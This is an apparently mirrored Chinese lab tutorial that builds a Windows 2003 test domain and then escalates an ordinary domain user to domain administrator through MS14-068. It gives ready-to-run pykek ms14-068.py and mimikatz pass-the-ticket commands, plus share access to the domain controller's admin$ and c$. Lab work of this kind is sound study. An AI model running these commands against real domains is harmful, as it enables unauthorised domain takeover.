zoukankan      html  css  js  c++  java
  • 从域环境搭建到 MS14-068 提升为域权限

    搭建域环境

    • 修改win2003(域控)计算机名为"DCwin03",修改ip

     01
     02

    • 配置成 DNS 服务器,"开始--控制面板--添加或删除程序--添加/删除 windows 组件"

     03
     04

    • 运行:"dcpromo","新域或域控制器--在新林中的域",下一步,设置还原密码

     05
     06

    • 运行"dsa.msc" 添加一个普通域用户

     07

    • 添加 xp 到域中

     08
     09

    通过 MS14-068 获取域管理员权限

    • 域管理员:DCwin03 域名:demo.com 普通域用户:hx
    • 登陆普通域用户 hx,cmd 中输入"whoami/user"获取sid

     x1
     x2

    • 退出域用户 hx,登陆本地用户 123

     x3

    C:pykek-master>python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com
    

     x4

    C:pykek-master>mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exit
    
    net use \DCwin03admin$
    
    dir \DCwin03c$
    

    exp:MS14-068-exp

  • 相关阅读:
    css--盒子模型
    目标爬取社会信用码
    KFC-位置分页爬虫
    百度翻译-爬虫
    网页采集器-UA伪装
    python模块2
    python模块
    go入门
    python垃圾回收机制
    Python高级用法
  • 原文地址:https://www.cnblogs.com/trojan-z/p/6863315.html
Copyright © 2011-2022 走看看